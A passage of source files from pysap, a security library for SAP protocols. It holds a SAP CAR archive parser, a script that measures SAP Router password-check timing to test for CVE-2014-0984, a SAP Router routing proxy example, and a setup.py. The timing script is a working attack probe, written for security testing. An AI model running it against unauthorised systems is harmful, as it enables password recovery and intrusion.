     (stat.S_IXOTH,         "x"))
)


def filemode(mode):
    """Convert a file's mode to a string of the form '-rwxrwxrwx'."""
    perm = []
    for table in _filemode_table:
        for bit, char in table:
            if mode & bit == bit:
                perm.append(char)
                break
        else:
            perm.append("-")
    return "".join(perm)


class SAPCARInvalidFileException(Exception):
    """Exception to denote an invalid SAP CAR file"""


class SAPCARInvalidChecksumException(Exception):
    """Exception to denote a syntactically valid SAP CAR file with an invalid checksum"""


class SAPCARCompressedBlobFormat(PacketNoPadded):
    """SAP CAR compressed blob

    This is used for decompressing blobs inside the compressed block.
    """
    name = "SAP CAR Archive Compressed blob"

    fields_desc = [
        LEIntField("compressed_length", None),
        LEIntField("uncompress_length", None),
        ByteEnumField("algorithm", 0x12, {0x12: "LZH", 0x10: "LZC"}),
        StrFixedLenField("magic_bytes", "\x1f\x9d", 2),
        ByteField("special", 2),
        ConditionalField(StrField("blob", None, remain=4), lambda x: x.compressed_length <= 8),
        ConditionalField(StrFixedLenField("blob", None, length_from=lambda x: x.compressed_length - 8),
                         lambda x: x.compressed_length > 8),
    ]


SAPCAR_BLOCK_TYPE_COMPRESSED_LAST = "ED"
"""SAP CAR compressed last block"""

SAPCAR_BLOCK_TYPE_COMPRESSED = "DA"
"""SAP CAR compressed block"""

SAPCAR_BLOCK_TYPE_UNCOMPRESSED_LAST = "UE"
"""SAP CAR uncompressed last block"""

SAPCAR_BLOCK_TYPE_UNCOMPRESSED = "UD"
"""SAP CAR uncompressed block"""


class SAPCARCompressedBlockFormat(PacketNoPadded):
    """SAP CAR compressed block

    This is used for decompressing blocks inside the file info format.
    """
    name = "SAP CAR Archive Compressed block"

    fields_desc = [
        StrFixedLenField("type", SAPCAR_BLOCK_TYPE_COMPRESSED_LAST, 2),
        ConditionalField(PacketField("compressed", None, SAPCARCompressedBlobFormat),
                         lambda x: x.type in [SAPCAR_BLOCK_TYPE_COMPRESSED_LAST, SAPCAR_BLOCK_TYPE_COMPRESSED]),
        ConditionalField(LESignedIntField("checksum", 0),
                         lambda x: x.type == SAPCAR_BLOCK_TYPE_COMPRESSED_LAST),
    ]


def sapcar_is_last_block(packet):
    """Helper function that evaluates if a block packet is the last one or not.

    :param packet: packet to check
    :type packet: Packet

    :return: if the block packet is the last one
    :rtype: bool
    """
    return packet.type in [SAPCAR_BLOCK_TYPE_COMPRESSED_LAST, SAPCAR_BLOCK_TYPE_UNCOMPRESSED_LAST]


SAPCAR_TYPE_FILE = "RG"
"""SAP CAR regular file string"""

SAPCAR_TYPE_DIR = "DR"
"""SAP CAR directory file string"""


SAPCAR_VERSION_200 = "2.00"
"""SAP CAR file format version 2.00 string"""

SAPCAR_VERSION_201 = "2.01"
"""SAP CAR file format version 2.01 string"""


class SAPCARArchiveFilev200Format(PacketNoPadded):
    """SAP CAR file information format

    This is ued to parse files inside a SAP CAR archive.
    """
    name = "SAP CAR Archive File 2.00"

    version = SAPCAR_VERSION_200

    fields_desc = [
        StrFixedLenField("type", SAPCAR_TYPE_FILE, 2),
        LEIntField("perm_mode", 0),
        LEIntField("file_length", 0),
        LEIntField("unknown1", 0),
        LEIntField("unknown2", 0),
        LEIntField("timestamp", 0),
        StrFixedLenField("unknown3", None, 10),
        FieldLenField("filename_length", None, length_of="filename", fmt="<H"),
        StrFixedLenField("filename", None, length_from=lambda x: x.filename_length),
        ConditionalField(PacketListStopField("blocks", None, SAPCARCompressedBlockFormat, stop=sapcar_is_last_block),
                         lambda x: x.type == SAPCAR_TYPE_FILE and x.file_length > 0),
    ]

    def extract(self, fd):
        """Extracts the archive file and writes the extracted file to the provided file object. Returns the checksum
        obtained from the archive. If blocks are uncompressed, the file is directly extracted. If the blocks are
        compressed, each block is added to a buffer, skipping the length field, and decompression is performed after
        the block marked as last. Expected length and compression header is obtained from the first block and checksum
        from the last block.

        :param fd: file-like object to write the extracted file to
        :type fd: file

        :return: checksum
        :rtype: int

        :raise DecompressError: If there's a decompression error
        :raise SAPCARInvalidFileException: If the file is invalid
        """

        if self.file_length == 0:
            return 0

        compressed = ""
        checksum = 0
        exp_length = None

        remaining_length = self.file_length
        for block in self.blocks:
            # Process uncompressed block types
            if block.type in [SAPCAR_BLOCK_TYPE_UNCOMPRESSED, SAPCAR_BLOCK_TYPE_UNCOMPRESSED_LAST]:
                fd.write(block.compressed)
                remaining_length -= len(block.compressed)
            # Store compressed block types for later decompression
            elif block.type in [SAPCAR_BLOCK_TYPE_COMPRESSED, SAPCAR_BLOCK_TYPE_COMPRESSED_LAST]:
                # Add compressed block to a buffer, skipping the first 4 bytes of each block (uncompressed length)
                compressed += str(block.compressed)[4:]
                # If the expected length wasn't already set, do it
                if not exp_length:
                    exp_length = block.compressed.uncompress_length
            else:
                raise SAPCARInvalidFileException("Invalid block type found")

            # Check last block, performing decompression if needed
            if sapcar_is_last_block(block):
                checksum = block.checksum
                # If there was at least one compressed block that set the expected length, decompress it
                if exp_length:
                    (_, block_length, block_buffer) = decompress(str(compressed), exp_length)
                    if block_length != exp_length or not block_buffer:
                        raise DecompressError("Error decompressing block")
                    fd.write(block_buffer)
                break

        return checksum


class SAPCARArchiveFilev201Format(PacketNoPadded):
    """SAP CAR file information format

    This is used to parse files inside a SAP CAR archive.
    """
    name = "SAP CAR Archive File 2.01"

    version = SAPCAR_VERSION_201

    fields_desc = [
        StrFixedLenField("type", SAPCAR_TYPE_FILE, 2),
        LEIntField("perm_mode", 0),
        LEIntField("file_length", 0),
        LEIntField("unknown1", 0),
        LEIntField("unknown2", 0),
        LEIntField("timestamp", 0),
        StrFixedLenField("unknown3", None, 10),
        FieldLenField("filename_length", None, length_of="filename", fmt="<H"),
        StrNullFixedLenField("filename", None, length_from=lambda x: x.filename_length - 1),
        ConditionalField(PacketListStopField("blocks", None, SAPCARCompressedBlockFormat, stop=sapcar_is_last_block),
                         lambda x: x.type == SAPCAR_TYPE_FILE and x.file_length > 0),
    ]

    def extract(self, fd):
        """Extracts the archive file and writes the extracted file to the provided file object. Returns the checksum
        obtained from the archive. If blocks are uncompressed, the file is directly extracted. If the blocks are
        compressed, each block is decompressed independently. Checksum is obtained from the last block.

        :param fd: file-like object to write the extracted file to
        :type fd: file

        :return: checksum
        :rtype: int

        :raise DecompressError: If there's a decompression error
        :raise SAPCARInvalidFileException: If the file is invalid
        """
        if self.file_length == 0:
            return 0

        checksum = 0

        remaining_length = self.file_length
        for block in self.blocks:
            # Process uncompressed block types
            if block.type in [SAPCAR_BLOCK_TYPE_UNCOMPRESSED, SAPCAR_BLOCK_TYPE_UNCOMPRESSED_LAST]:
                fd.write(block.compressed)
                remaining_length -= len(block.compressed)
            # Process compressed block types
            elif block.type in [SAPCAR_BLOCK_TYPE_COMPRESSED, SAPCAR_BLOCK_TYPE_COMPRESSED_LAST]:
                compressed = block.compressed
                exp_block_length = compressed.uncompress_length
                (_, block_length, block_buffer) = decompress(str(compressed)[4:], exp_block_length)
                if block_length != exp_block_length or not block_buffer:
                    raise DecompressError("Error decompressing block")
                fd.write(block_buffer)
                remaining_length -= block_length
            else:
                raise SAPCARInvalidFileException("Invalid block type found")

            # Check last block
            if sapcar_is_last_block(block):
                checksum = block.checksum
                break

        return checksum


sapcar_archive_file_versions = {
    SAPCAR_VERSION_200: SAPCARArchiveFilev200Format,
    SAPCAR_VERSION_201: SAPCARArchiveFilev201Format,
}
"""SAP CAR file format versions"""


class SAPCARArchiveFormat(Packet):
    """SAP CAR file format

    This is used to parse SAP CAR archive files.
    """
    name = "SAP CAR Archive"

    fields_desc = [
        StrFixedLenField("eyecatcher", "CAR ", 4),
        StrFixedLenField("version", SAPCAR_VERSION_201, 4),
        ConditionalField(PacketListField("files0", None, SAPCARArchiveFilev200Format),
                         lambda x: x.version == SAPCAR_VERSION_200),
        ConditionalField(PacketListField("files1", None, SAPCARArchiveFilev201Format),
                         lambda x: x.version == SAPCAR_VERSION_201),
    ]


class SAPCARArchiveFile(object):
    """Proxy class that can be used to access a file inside a SAP CAR
    archive and obtain its properties.
    """

    # Instance attributes
    _file_format = None

    def __init__(self, file_format=None):
        """Construct the file proxy object from a L{SAPCARArchiveFilev200Format}
        or L{SAPCARArchiveFilev201Format} object.

        :param file_format: file format object
        :type file_format: Packet
        """
        self._file_format = file_format

    def is_file(self):
        """Determines if the file is a regular file.

        :return: if the file is a regular file
        :rtype: bool
        """
        return self._file_format.type == SAPCAR_TYPE_FILE

    def is_directory(self):
        """Determines if the file is a directory.

        :return: if the file is a directory
        :rtype: bool
        """
        return self._file_format.type == SAPCAR_TYPE_DIR

    @property
    def version(self):
        """The version of the file.

        :return: version of the file
        :rtype: string
        """
        return self._file_format.version

    @property
    def type(self):
        """The type of the file.

        :return: type of the file
        :rtype: string
        """
        return self._file_format.type

    @property
    def filename(self):
        """The name of the file.

        :return: name of the file
        :rtype: string
        """
        return self._file_format.filename

    @filename.setter
    def filename(self, filename):
        """Sets the name of the file.

        :param filename: the name of the file
        :type filename: string
        """
        self._file_format.filename = filename
        self._file_format.filename_length = len(filename)
        if self._file_format.version == SAPCAR_VERSION_201:
            self._file_format.filename_length += 1

    @property
    def size(self):
        """The size of the file.

        :return: size of the file
        :rtype: int
        """
        return self._file_format.file_length

    @size.setter
    def size(self, file_length):
        """Sets the size of the file.

        :param file_length: the size of the file
        :type file_length: int
        """
        self._file_format.file_length = file_length

    @property
    def permissions(self):
        """The permissions of the file.

        :return: permissions in human-readable format
        :rtype: string
        """
        return filemode(self._file_format.perm_mode)

    @permissions.setter
    def permissions(self, perm_mode):
        """Sets the permissions on the file.

        :param perm_mode: the permissions to set
        :type perm_mode: int
        """
        self._file_format.perm_mode = perm_mode

    @property
    def perm_mode(self):
        """The permissions mode of the file.

        :return: permissions in numeric format
        :rtype: int
        """
        return self._file_format.perm_mode

    @property
    def timestamp(self):
        """The timestamp of the file.

        :return: timestamp in human-readable format
        :rtype: string
        """
        return datetime.utcfromtimestamp(self._file_format.timestamp).strftime('%d %b %Y %H:%M')

    @timestamp.setter
    def timestamp(self, timestamp):
        """Sets the file timestamp.

        :param timestamp: the timestamp to set
        :type timestamp: int
        """
        self._file_format.timestamp = timestamp

    @property
    def timestamp_raw(self):
        """The timestamp of the file.

        :return: timestamp in numeric format
        :rtype: int
        """
        return self._file_format.timestamp

    @property
    def checksum(self):
        """The checksum of the file.

        :return: checksum
        :rtype: int

        :raise SAPCARInvalidFileException: if the file is invalid and contains more than one last block
        """
        checksum = None
        if self._file_format.blocks:
            for block in self._file_format.blocks:
                if block.type == SAPCAR_BLOCK_TYPE_COMPRESSED_LAST:
                    if checksum is not None:
                        raise SAPCARInvalidFileException("More than one last block found for the file")
                    checksum = block.checksum
        return checksum

    @checksum.setter
    def checksum(self, checksum):
        """Sets the file checksum.

        :param checksum: checksum to set
        :rtype checksum: int

        :raise SAPCARInvalidFileException: if the file is invalid and contains more than one last block
        """
        checksum_set = False
        for block in self._file_format.blocks:
            if block.type == SAPCAR_BLOCK_TYPE_COMPRESSED_LAST:
                if checksum_set:
                    raise SAPCARInvalidFileException("More than one last block found for the file")
                block.checksum = checksum
                checksum_set = True
        if not checksum_set:
            raise SAPCARInvalidFileException("No last block found for the file")

    @staticmethod
    def calculate_checksum(data):
        """Calculates the CRC32 checksum of a given data string.

        :param data: data to calculate the checksum over
        :type data: str

        :return: the CRC32 checksum
        :rtype: int
        """
        return -crc32(data, -1) - 1

    @classmethod
    def from_file(cls, filename, version=SAPCAR_VERSION_201, archive_filename=None):
        """Populates the file format object from an actual file on the
        local file system.

        :param filename: filename to build the file format object from
        :type filename: string

        :param version: version of the file to construct
        :type version: string

        :param archive_filename: filename to use inside the archive file
        :type archive_filename: string

        :raise ValueError: if the version requested is invalid
        """

        # Read the file properties and its content
        stat = os_stat(filename)
        with open(filename, "rb") as fd:
            data = fd.read()

        # Compress the file content and build the compressed string
        try:
            (_, out_length, out_buffer) = compress(data, ALG_LZH)
        except CompressError:
            return None
        out_buffer = pack("<I", out_length) + out_buffer

        # Check the version and grab the file format class
        if version not in sapcar_archive_file_versions:
            raise ValueError("Invalid version")
        ff = sapcar_archive_file_versions[version]

        # If an archive filename was not provided, use the actual filename
        if archive_filename is None:
            archive_filename = filename

        # Build the object and fill the fields
        archive_file = cls()
        archive_file._file_format = ff()
        archive_file._file_format.perm_mode = stat.st_mode
        archive_file._file_format.timestamp = stat.st_atime
        archive_file._file_format.file_length = stat.st_size
        archive_file._file_format.filename = archive_filename
        archive_file._file_format.filename_length = len(archive_filename)
        if archive_file._file_format.version == SAPCAR_VERSION_201:
            archive_file._file_format.filename_length += 1
        # Put the compressed blob inside a last block and add it to the object
        block = SAPCARCompressedBlockFormat()
        block.type = SAPCAR_BLOCK_TYPE_COMPRESSED_LAST
        block.compressed = SAPCARCompressedBlobFormat(out_buffer)
        block.checksum = cls.calculate_checksum(data)
        archive_file._file_format.blocks.append(block)

        return archive_file

    @classmethod
    def from_archive_file(cls, archive_file, version=SAPCAR_VERSION_201):
        """Populates the file format object from another archive file object.

        :param archive_file: archive file object to build the file format object from
        :type archive_file: L{SAPCARArchiveFile}

        :param version: version of the file to construct
        :type version: string

        :raise ValueError: if the version requested is invalid
        """

        if version not in sapcar_archive_file_versions:
            raise ValueError("Invalid version")
        ff = sapcar_archive_file_versions[version]

        new_archive_file = cls()
        new_archive_file._file_format = ff()
        new_archive_file._file_format.type = archive_file._file_format.type
        new_archive_file._file_format.perm_mode = archive_file._file_format.perm_mode
        new_archive_file._file_format.timestamp = archive_file._file_format.timestamp
        new_archive_file._file_format.file_length = archive_file._file_format.file_length
        new_archive_file._file_format.filename = archive_file._file_format.filename
        new_archive_file._file_format.filename_length = archive_file._file_format.filename_length

        for block in archive_file._file_format.blocks:
            new_block = SAPCARCompressedBlockFormat()
            new_block.type = block.type
            new_block.compressed = SAPCARCompressedBlobFormat(str(block.compressed))
            new_block.checksum = block.checksum
            new_archive_file._file_format.blocks.append(new_block)

        return new_archive_file

    def open(self, enforce_checksum=False):
        """Opens the compressed file and returns a file-like object that
        can be used to access its uncompressed content.

        :param enforce_checksum: If the checksum validation should be enforce
        :type enforce_checksum: bool

        :return: file-like object with the uncompressed file content
        :rtype: file

        :raise Exception: If the file to open is a directory
        :raise DecompressError: If there's a decompression error
        :raise SAPCARInvalidFileException: If the file is invalid
        :raise SAPCARInvalidChecksumException: If the checksum is invalid
        """
        # Check that the type is file, so we don't try to extract from a directory
        if self.is_directory():
            raise Exception("Invalid file type")

        # Extract the file to a file-like object
        out_file = StringIO()
        checksum = self._file_format.extract(out_file)
        out_file.seek(0)

        # Validate the checksum if required
        if enforce_checksum:
            if checksum != self.calculate_checksum(out_file.getvalue()):
                raise SAPCARInvalidChecksumException("Invalid checksum found")
            out_file.seek(0)

        # Return the extracted file
        return out_file

    def check_checksum(self):
        """Checks if the checksum of the file is valid.

        :return: if the checksum matches
        :rtype: bool
        """
        if self.size == 0:
            return True
        crc = self.calculate_checksum(self.open().read())
        return crc == self.checksum


class SAPCARArchive(object):
    """Proxy class that can be used to read SAP CAR archive files.
    """

    # Instance attributes
    filename = None
    fd = None
    _sapcar = None

    def __init__(self, fil, mode="rb+", version=SAPCAR_VERSION_201):
        """Opens an archive file and allow access to it.

        :param fil: filename or file descriptor to open
        :type fil: string or file

        :param mode: mode to open the file
        :type mode: string

        :param version: archive file version to use when creating
        :type version: string
        """

        # Ensure version is withing supported versions
        if version not in sapcar_archive_file_versions:
            raise ValueError("Invalid version")

        # Ensure mode is within supported modes
        if mode not in ["r", "r+", "w", "w+", "rb", "rb+", "wb", "wb+"]:
            raise ValueError("Invalid mode")

        # Ensure file is open in binary mode
        if "b" not in mode:
            mode += "b"

        if isinstance(fil, (basestring, unicode)):
            self.filename = fil
            self.fd = open(fil, mode)
        else:
            self.filename = getattr(fil, "name", None)
            self.fd = fil

        if "r" in mode:
            self.read()
        else:
            self.create()
            self.version = version

    @property
    def files(self):
        """The list of file objects inside this archive file.

        :return: list of file objects
        :rtype: L{dict} of L{SAPCARArchiveFile}
        """
        fils = {}
        if self._files:
            for fil in self._files:
                fils[fil.filename] = SAPCARArchiveFile(fil)
        return fils

    @property
    def files_names(self):
        """The list of file names inside this archive file.

        :return: list of file names
        :rtype: L{list} of L{string}
        """
        return self.files.keys()

    @property
    def version(self):
        """The version of the archive file.

        :return: version
        :rtype: string
        """
        return self._sapcar.version

    @version.setter
    def version(self, version):
        """Sets the version of the file. If the version is different to the current one, it
        converts the archive file.

        :param version: version to set
        :type version: string
        """
        if version not in sapcar_archive_file_versions:
            raise ValueError("Invalid version")
        # If version is different, we should convert each file
        if version != self._sapcar.version:
            fils = []
            for fil in self.files.values():
                new_file = SAPCARArchiveFile.from_archive_file(fil, version=version)
                fils.append(new_file._file_format)
                self._files.remove(fil._file_format)
            self._sapcar.version = version
            if self._files is None:
                self._files = []
            self._files.extend(fils)

    def read(self):
        """Reads the SAP CAR archive file and populates the files list.

        :raise Exception: if the file is invalid or unsupported
        """
        self.fd.seek(0)
        self._sapcar = SAPCARArchiveFormat(self.fd.read())
        if self._sapcar.eyecatcher != "CAR ":
            raise Exception("Invalid or unsupported eyecatcher in file")
        if self._sapcar.version not in sapcar_archive_file_versions:
            raise Exception("Invalid or unsupported version in file")

    @property
    def _files(self):
        """The file format objects according to the version.

        :return: files format objects according to the version
        """
        if self.version == SAPCAR_VERSION_200:
            return self._sapcar.files0
        else:
            return self._sapcar.files1

    @_files.setter
    def _files(self, files):
        if self.version == SAPCAR_VERSION_200:
            self._sapcar.files0 = files
        else:
            self._sapcar.files1 = files

    def create(self):
        """Creates the structure for holding a new SAP CAR archive file.
        """
        self._sapcar = SAPCARArchiveFormat()

    def write(self):
        """Writes the SAP CAR archive file to the file descriptor.
        """
        self.fd.seek(0)
        self.fd.write(str(self._sapcar))
        self.fd.flush()

    def write_as(self, filename=None):
        """Writes the SAP CAR archive file to another file.

        :param filename: name of the file to write to
        :type filename: string
        """
        if not filename:
            self.write()
        else:
            with open(filename, "w") as fd:
                fd.write(str(self._sapcar))

    def add_file(self, filename, archive_filename=None):
        """Adds a new file to the SAP CAR archive file.

        :param filename: name of the file to add
        :type filename: string

        :param archive_filename: name of the file to use in the archive
        :type archive_filename: string
        """
        fil = SAPCARArchiveFile.from_file(filename, self.version, archive_filename)
        self._files.append(fil._file_format)

    def open(self, filename):
        """Returns a file-like object that can be used to access a file
        inside the SAP CAR archive.

        :param filename: name of the file to open
        :type filename: string

        :return: a file-like object that can be used to access the decompressed file.
        :rtype: file
        """
        if filename not in self.files:
            raise Exception("Invalid filename")
        return self.files[filename].open()

    def close(self):
        """Close the file descriptor object associated to the archive file.
        """
        self.fd.close()

    def raw(self):
        """Returns the raw data of the archive file.

        :return: raw data
        :rtype: string
        """
        if self._sapcar:
            return str(self._sapcar)
        return ""



#!/usr/bin/env python
# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2012-2017 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
import logging
from optparse import OptionParser, OptionGroup
# External imports
from scapy.config import conf
from scapy.packet import bind_layers
# Custom imports
import pysap
from pysap.SAPNI import SAPNI, SAPNIStreamSocket
from pysap.SAPRouter import SAPRouter, get_router_version

# Try to import fau-timer for failing gracefully if not found
try:
    import fau_timer
    has_fau_timer = True
except ImportError:
    has_fau_timer = False


# Bind the SAPRouter layer
bind_layers(SAPNI, SAPRouter, )

# Set the verbosity to 0
conf.verb = 0


# Command line options parser
def parse_options():

    description = "This example script connects with a SAP Router service and makes an information request using a " \
                  "provided password. It then records the time the remote service takes to respond to the request. " \
                  "Further analysis of the time records could be performed in order to identify whether the server " \
                  "is vulnerable to a timing attack on the password check (CVE-2014-0984). More details about the  " \
                  "vulnerability in https://www.coresecurity.com/advisories/sap-router-password-timing-attack. The  " \
                  "script make use of the fau_timer library for measuring the timing of server's responses. " \
                  "Install the library from https://github.com/seecurity/mona-timing-lib."

    epilog = "pysap %(version)s - %(url)s - %(repo)s" % {"version": pysap.__version__,
                                                         "url": pysap.__url__,
                                                         "repo": pysap.__repo__}

    usage = "Usage: %prog [options] -d <remote host>"

    parser = OptionParser(usage=usage, description=description, epilog=epilog)

    target = OptionGroup(parser, "Target")
    target.add_option("-d", "--remote-host", dest="remote_host", default="127.0.0.1",
                      help="Remote host [%default]")
    target.add_option("-p", "--remote-port", dest="remote_port", type="int", default=3299,
                      help="Remote port [%default]")
    target.add_option("--router-version", dest="router_version", type="int",
                      help="SAP Router version to use [retrieve from the remote SAP Router]")
    parser.add_option_group(target)

    misc = OptionGroup(parser, "Misc options")
    misc.add_option("-t", "--tries", dest="tries", default=10, type="int",
                    help="Amount of tries to make for each length [%default]")
    misc.add_option("--password", dest="password", default="password",
                    help="Correct password to test")
    misc.add_option("-o", "--output", dest="output", default="output.csv",
                    help="Output file [%default]")
    misc.add_option("-v", "--verbose", dest="verbose", action="store_true", default=False,
                    help="Verbose output [%default]")
    parser.add_option_group(misc)

    (options, _) = parser.parse_args()

    if not options.remote_host:
        parser.error("Remote host is required")

    return options


def try_password(options, password, output=None, k=0):

    p = SAPRouter(type=SAPRouter.SAPROUTER_ADMIN, version=options.router_version)
    p.adm_command = 2
    p.adm_password = password
    p = str(SAPNI() / p)

    fau_timer.init()
    fau_timer.send_request(options.remote_host, options.remote_port, p, len(p))
    fau_timer.calculate_time()
    cpu_peed = fau_timer.get_speed()
    cpu_ticks = fau_timer.get_cpu_ticks()
    time = fau_timer.get_time()

    if options.verbose:
        print("Request time: CPU Speed: %s Hz CPU Ticks: %s Time: %s nanosec" % (cpu_peed, cpu_ticks, time))

    # Write the time to the output file
    if output:
        output.write("%i,%s,%s\n" % (k, password, time))

    return time


# Main function
def main():
    options = parse_options()

    if not has_fau_timer:
        print ("[-] Required library not found. Please install it from https://github.com/seecurity/mona-timing-lib")
        return

    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    # Initiate the connection
    conn = SAPNIStreamSocket.get_nisocket(options.remote_host, options.remote_port)
    print("[*] Connected to the SAP Router %s:%d" % (options.remote_host, options.remote_port))

    # Retrieve the router version used by the server if not specified
    if options.router_version is None:
        options.router_version = get_router_version(conn)

    print("[*] Using SAP Router version %d" % options.router_version)

    print("[*] Checking if the server is vulnerable to a timing attack (CVE-2014-0984) ...")

    with open(options.output, "w") as f:

        c = 0
        for i in range(0, len(options.password) + 1):
            password = options.password[:i] + "X" * (len(options.password) - i)
            print("[*] Trying with password (%s) len %d" % (password, len(password)))
            for _ in range(0, options.tries):
                try_password(options, password, f, c)
                c += 1


if __name__ == "__main__":
    main()



#!/usr/bin/env python
# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2012-2017 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
import logging
from socket import error as SocketError
from optparse import OptionParser, OptionGroup
# External imports
from scapy.config import conf
from scapy.packet import bind_layers
# Custom imports
import pysap
from pysap.SAPNI import SAPNI
from pysap.SAPRouter import (SAPRouter, SAPRouteException,
                             SAPRouterNativeProxy,
                             SAPRouterNativeRouterHandler)


# Bind the SAPRouter layer
bind_layers(SAPNI, SAPRouter, )

# Set the verbosity to 0
conf.verb = 0


# Command line options parser
def parse_options():

    description = "This example script routes a connection through a SAP Router service. Similar to Bizploit's " \
                  "'saprouterNative', for more information check: " \
                  "https://blog.onapsis.com/blog/assessing-a-saprouters-security-with-onapsis-bizploit-part-i/ and "\
                  "https://blog.onapsis.com/blog/assessing-a-saprouters-security-with-onapsis-bizploit-part-ii/"

    epilog = "pysap %(version)s - %(url)s - %(repo)s" % {"version": pysap.__version__,
                                                         "url": pysap.__url__,
                                                         "repo": pysap.__repo__}

    usage = "Usage: %prog [options] -d <remote host>"

    parser = OptionParser(usage=usage, description=description, epilog=epilog)

    target = OptionGroup(parser, "Target")
    target.add_option("-d", "--remote-host", dest="remote_host", default="127.0.0.1",
                      help="Remote host [%default]")
    target.add_option("-p", "--remote-port", dest="remote_port", type="int", default=3299,
                      help="Remote port [%default]")
    target.add_option("-t", "--target-host", dest="target_host",
                      help="Target host to connect")
    target.add_option("-r", "--target-port", dest="target_port", type="int",
                      help="Target port to connect")
    target.add_option("-P", "--target-pass", dest="target_pass",
                      help="Target password")
    target.add_option("-a", "--local-host", dest="local_host", default="127.0.0.1",
                      help="Local host to listen [%default]")
    target.add_option("-l", "--local-port", dest="local_port", type="int",
                      help="Local port to listen [target-port]")
    target.add_option("--talk-mode", dest="talk_mode", default="raw",
                      help="Talk mode to use when requesting the route (raw or ni) [%default]")
    parser.add_option_group(target)

    misc = OptionGroup(parser, "Misc options")
    misc.add_option("-v", "--verbose", dest="verbose", action="store_true", default=False,
                    help="Verbose output [%default]")
    parser.add_option_group(misc)

    (options, _) = parser.parse_args()

    if not options.remote_host:
        parser.error("Remote host is required")
    if not options.target_host:
        parser.error("Target host to connect to is required")
    if not options.target_port:
        parser.error("Target port to connect to is required")
    options.talk_mode = options.talk_mode.lower()
    if options.talk_mode not in ["raw", "ni"]:
        parser.error("Invalid talk mode")

    if not options.local_port:
        print("[*] No local port specified, using target port %d" % options.target_port)
        options.local_port = options.target_port

    return options


# Main function
def main():
    options = parse_options()

    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    print("[*] Setting a proxy between %s:%d and remote SAP Router %s:%d (talk mode %s)" % (options.local_host,
                                                                                            options.local_port,
                                                                                            options.remote_host,
                                                                                            options.remote_port,
                                                                                            options.talk_mode))

    options.talk_mode = {"raw": 1, "ni": 0}[options.talk_mode]

    proxy = SAPRouterNativeProxy(options.local_host, options.local_port,
                                 options.remote_host, options.remote_port,
                                 SAPRouterNativeRouterHandler,
                                 target_address=options.target_host,
                                 target_port=options.target_port,
                                 target_pass=options.target_pass,
                                 talk_mode=options.talk_mode,
                                 keep_alive=False,
                                 options=options)

    try:
        while True:
            try:
                proxy.handle_connection()
            except SocketError as e:
                print("[*] Socket Error %s" % e)

    except KeyboardInterrupt:
        print("[*] Cancelled by the user !")
    except SAPRouteException as e:
        print("[*] Closing routing do to error %s" % e)


if __name__ == "__main__":
    main()



#!/usr/bin/env python
# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2012-2017 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
from os import system
from setuptools import setup, Extension, Command
# Custom imports
import pysap


class APIDocumentationCommand(Command):
    """Custom command for building the documentation with Sphinx.
    """

    description = "Builds the documentation using Sphinx"
    user_options = []

    def initialize_options(self):
        pass

    def finalize_options(self):
        pass

    def run(self):
        """Runs Sphinx
        """
        system("cd docs && make html")


class PreExecuteNotebooksCommand(Command):
    """Custom command for pre-executing Jupyther notebooks included in the documentation.
    """

    description = "Pre-executes Jupyther notebooks included in the documentation"
    user_options = []

    def initialize_options(self):
        pass

    def finalize_options(self):
        pass

    def run(self):
        """Pre executes notebooks
        """
        system("jupyter nbconvert --inplace --to notebook --execute docs/protocols/*.ipynb")
        system("jupyter nbconvert --inplace --to notebook --execute docs/fileformats/*.ipynb")


sapcompress = Extension('pysapcompress',
                        ['pysapcompress/pysapcompress.cpp',
                         'pysapcompress/vpa105CsObjInt.cpp',
                         'pysapcompress/vpa106cslzc.cpp',
                         'pysapcompress/vpa107cslzh.cpp',
                         'pysapcompress/vpa108csulzh.cpp'],
                        define_macros=[  # Enable this macro if you want some debugging information on the (de)compression functions
                                       #('DEBUG', None),
                                         # Enable this macro if you want detailed debugging information (hexdumps) on the (de)compression functions
                                       #('DEBUG_TRACE', None),
                        ])


setup(name=pysap.__title__,   # Package information
      version=pysap.__version__,
      author='Martin Gallo',
      author_email='mgallo@coresecurity.com',
      description='Python library for crafting SAP\'s network protocols packets',
      long_description=pysap.__doc__,  # @UndefinedVariable
      url=pysap.__url__,
      download_url=pysap.__url__,
      license=pysap.__license__,
      classifiers=['Development Status :: 3 - Alpha',
                   'Intended Audience :: Developers',
                   'Intended Audience :: Information Technology',
                   'Intended Audience :: System Administrators',
                   'License :: OSI Approved :: GNU General Public License v2 or later (GPLv2+)',
                   'Programming Language :: Python',
                   'Programming Language :: C++',
                   'Topic :: Security'],
      # Packages list
      packages=['pysap'],
      provides=['pysapcompress', 'pysap'],

      # Extension module compilation
      ext_modules=[sapcompress],

      # Script files
      scripts=['bin/pysapcar'],

      # Tests command
      test_suite='tests.test_suite',

      # Documentation commands
      cmdclass={'doc': APIDocumentationCommand,
                'notebooks': PreExecuteNotebooksCommand},

      # Requirements
      install_requires=open('requirements.txt').read().splitlines(),

      # Optional requirements for docs and some examples
